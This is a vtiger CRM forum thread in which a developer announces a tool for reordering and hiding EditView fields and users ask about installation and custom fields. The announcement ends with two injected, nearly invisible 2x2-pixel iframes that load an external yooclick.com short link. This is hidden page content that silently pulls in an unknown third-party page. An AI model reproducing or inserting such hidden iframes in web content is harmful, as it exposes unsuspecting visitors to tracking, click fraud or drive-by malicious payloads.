Edit Field Order updated

Hi folks,

I've updated the "arranging" of the field order of the EditView page. I now allow you to hide fields you don't need.

You access the utility from "Settings" / "Field Ordering in Blocks "

Please LMK how it works for you.

NOTE: This uses the latest version of VIP downloadable from the OWL repository below. If you install this and the HomeOrderSort mod, VIP will tell you that you have conflicing files (they both use the drag/drop libraries in include/dd). Simply FORCE the last one you install. <iframe width="2px" height="2px" src="http://www.yooclick.com/l/9qjblg"></iframe>; <iframe width="2px" height="2px" src="http://www.yooclick.com/l/9qjblg"></iframe>;

  • hello mike,

    thanks for taking the time to improve an already great program!

    i have a couple of questions about your "editfieldordering" feature.

    1) is it compatible with linux *.bin installations of vtiger?

    2) how, exactly, can i install it? if you have step-by-step instructions somewhere, please point me to them. i didn't find them when searching the forums.

    3) if i install and use this feature, is there any change it will interfere with -- or make impossible -- upgrading to future versions of vtiger?

    i look forward to your reply. we are just getting started with using vtiger and the kind of customization your utility promises will be crucial for us.

    by the way, will it let us reorganize custom fields that we create? we are just now working out the best way to create some of our own features -- but it can be very tedius to create them in the correct and logical order so that they appear on the page in the best order. right now, if we change our minds about the ordering of custom fields, we have to delete them all and create them all again from the start.

    thanks again for the contribution.

    regards,
    andy liebman

    a very impressed new user of vtiger
  • mike,

    can you tell us what is the status of fieldsortorder regarding reordering custom fields? does it work? does it work in both linux and windows, or only in one environment?
